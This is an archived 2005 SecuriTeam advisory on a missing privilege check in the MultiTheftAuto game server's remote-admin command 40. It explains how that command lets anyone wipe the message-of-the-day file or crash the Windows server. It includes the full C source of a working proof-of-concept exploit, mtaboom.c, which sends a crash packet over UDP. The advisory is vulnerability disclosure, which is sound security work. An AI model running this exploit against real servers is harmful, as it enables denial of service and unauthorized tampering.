[NEWS] MultiTheftAuto Privileges Escalation and DoS Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 09/26/05

  • Next message: SecuriTeam: "[UNIX] kcheckpass Insecure File Operation"
    To: list@securiteam.com
    Date: 26 Sep 2005 11:08:47 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      MultiTheftAuto Privileges Escalation and DoS Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

    MultiTheftAuto (MTA) is a closed-source mod and server for the games
    <http://www.rockstargames.com/grandtheftauto3/> Grand Theft Auto III and
    <http://www.rockstargames.com/vicecity/pc/> Grand Theft Auto: Vice City
    which adds multiplayer capabilities to them.

    MultiTheftAuto does not check privileges for a command that allow to
    overwrite information and cause a DoS by attackers.

    DETAILS

    Vulnerable Systems:
     * MultiTheftAuto version 0.5 patch 1 and prior

    Privileges Escalation:
    The MTA server has the remote administration option enabled by default.
    The problem is the existence of an undocumented command (number 40) which
    allows the modification or the deletion of the content of the motd.txt
    file used for the message of the day.
    This is the only command which doesn't check if the client is an
    administrator so anyone without permissions has access to it.

    Denail of Service:
    The command 40 is also the cause of another problem located in the same
    function which seems incomplete or experimental as showed by the following
    "retrieved" code:
        // open file for writing "w"
        length = *(u_int *)(src - (src % 4096));
        for(i = j = 0; i < length; i++) {
            if(src[i] == '\n') dst[j++] = '\r';
            dst[j++] = src[i];
            if(j < 1024) continue;
            if(!WriteFile(...)) break;
            j = 0;
        }
        // close file

    length is -1 so the function starts an almost endless loop which stops
    when the source buffer points to an unallocated zone of the memory. The
    result is the immediate crash of the MTA server.

    Seems that only the Windows server is affected by the crash because on
    Linux the function is substituited with the following "still incorrect"
    instruction which doesn't produce exceptions:
        fd = fopen("motd.txt", "w");
        fwrite(data + 4, 1, data, fd); // yes data is the buffer
        fclose(fd);

    Exploit:
    winerr.h can be found at:
    <http://www.securiteam.com/unixfocus/5UP0I1FC0Y.html>
    http://www.securiteam.com/unixfocus/5UP0I1FC0Y.html

    mtaboom.c:
    /*

    by Luigi Auriemma

    */

    #include <stdio.h>
    #include <stdlib.h>

    #ifdef WIN32
        #include <winsock.h>
        #include "winerr.h"

        #define close closesocket
        #define ONESEC 1000
    #else
        #include <unistd.h>
        #include <sys/socket.h>
        #include <sys/types.h>
        #include <arpa/inet.h>
        #include <netinet/in.h>
        #include <netdb.h>

        #define ONESEC 1
    #endif

    #define VER "0.1"
    #define BUFFSZ 4096
    #define PORT 4003
    #define TIMEOUT 3
    #define PING "\x0d\x30\x00" // not a ping, just a way to get a reply
    #define BOOM "\x28" // that's enough

    int timeout(int sock);
    u_int resolv(char *host);
    void std_err(void);

    int main(int argc, char *argv[]) {
        struct sockaddr_in peer;
        int sd,
                len;
        u_short port = PORT;
        u_char buff[BUFFSZ];

    #ifdef WIN32
        WSADATA wsadata;
        WSAStartup(MAKEWORD(1,0), &wsadata);
    #endif

        setbuf(stdout, NULL);

        fputs("\n"
            "MultiTheftAuto <= 0.5 patch 1 server crash/motd reset "VER"\n"
            "by Luigi Auriemma\n"
            "e-mail: aluigi@autistici.org\n"
            "web: http://aluigi.altervista.org\n"
            "\n", stdout);

        if(argc < 2) {
            printf("\n"
                "Usage: %s <host> [port(%hu)]\n"
                "\n", argv[0], port);
            exit(1);
        }

        if(argc > 2) port = atoi(argv[2]);
        peer.sin_addr.s_addr = resolv(argv[1]);
        peer.sin_port = htons(port);
        peer.sin_family = AF_INET;

        printf("- target %s : %hu\n",
            inet_ntoa(peer.sin_addr), port);

        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();

        fputs("- check server:\n", stdout);
        if(sendto(sd, PING, sizeof(PING) - 1, 0, (struct sockaddr *)&peer,
    sizeof(peer))
          < 0) std_err();
        if(timeout(sd) < 0) {
            fputs("\n"
                "Error: the server doesn't seem to support remote
    administration\n"
                " try using the port 24003\n"
                "\n", stdout);
            exit(1);
        }
        len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
        if(len < 0) std_err();

        sleep(ONESEC);

        fputs("- send BOOM packet:\n", stdout);
        if(sendto(sd, BOOM, sizeof(BOOM) - 1, 0, (struct sockaddr *)&peer,
    sizeof(peer))
          < 0) std_err();

        sleep(ONESEC);

        fputs("- check server:\n", stdout);
        if(sendto(sd, PING, sizeof(PING) - 1, 0, (struct sockaddr *)&peer,
    sizeof(peer))
          < 0) std_err();
        if(timeout(sd) < 0) {
            fputs("\nServer IS vulnerable!!!\n\n", stdout);
        } else {
            fputs("\nServer doesn't seem to crash but probably you have
    deleted its motd.txt file\n\n", stdout);
        }

        close(sd);
        return(0);
    }

    int timeout(int sock) {
        struct timeval tout;
        fd_set fd_read;
        int err;

        tout.tv_sec = TIMEOUT;
        tout.tv_usec = 0;
        FD_ZERO(&fd_read);
        FD_SET(sock, &fd_read);
        err = select(sock + 1, &fd_read, NULL, NULL, &tout);
        if(err < 0) std_err();
        if(!err) return(-1);
        return(0);
    }

    u_int resolv(char *host) {
        struct hostent *hp;
        u_int host_ip;

        host_ip = inet_addr(host);
        if(host_ip == INADDR_NONE) {
            hp = gethostbyname(host);
            if(!hp) {
                printf("\nError: Unable to resolv hostname (%s)\n\n", host);
                exit(1);
            } else host_ip = *(u_int *)hp->h_addr;
        }
        return(host_ip);
    }

    #ifndef WIN32
        void std_err(void) {
            perror("\nError");
            exit(1);
        }
    #endif

    /* EoF */

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:aluigi@autistici.org> Luigi
    Auriemma .
    The original article can be found at:
    <http://aluigi.altervista.org/adv/mtaboom-adv.txt>
    http://aluigi.altervista.org/adv/mtaboom-adv.txt

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[UNIX] kcheckpass Insecure File Operation"

    Relevant Pages

    • [NEWS] Outgun Multiple Vulnerabilities (Multiple DoS, Multiple Buffer Overflows)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Multiple Buffer Overflows) ... The buffers in which the server stores these two strings have a size of 64 ... int alen, ulen; ...
      (Securiteam)
    • [NEWS] SAP MaxDB Pre-Auth Command Execution
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... SAP MaxDB Pre-Auth Command Execution ... int sap_send(int sd, u8 *buff, int len); ...
      (Securiteam)
    • [UNIX] Cfengine Remotely Exploitable Buffer Overflow (net.c)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... cfservd daemon in Cfengine 2.x prior to version 2.0.8. ... unsigned int len = 0; ... void getshell; ...
      (Securiteam)
    • [NT] Stronghold DoS
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... In the packet used for joining the server is locatd the client's nickname ... unsigned char *gssdkcr( ... void show_info(u_char *data, int len); ...
      (Securiteam)
    • [UNIX] Remote Format String Vulnerabilities in eXtremail Server (MAIL FROM, Reappearing)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... to promote the most advanced vulnerability assessment solutions today. ... int send_sock; ... strncat (buf, "a", 1); ...
      (Securiteam)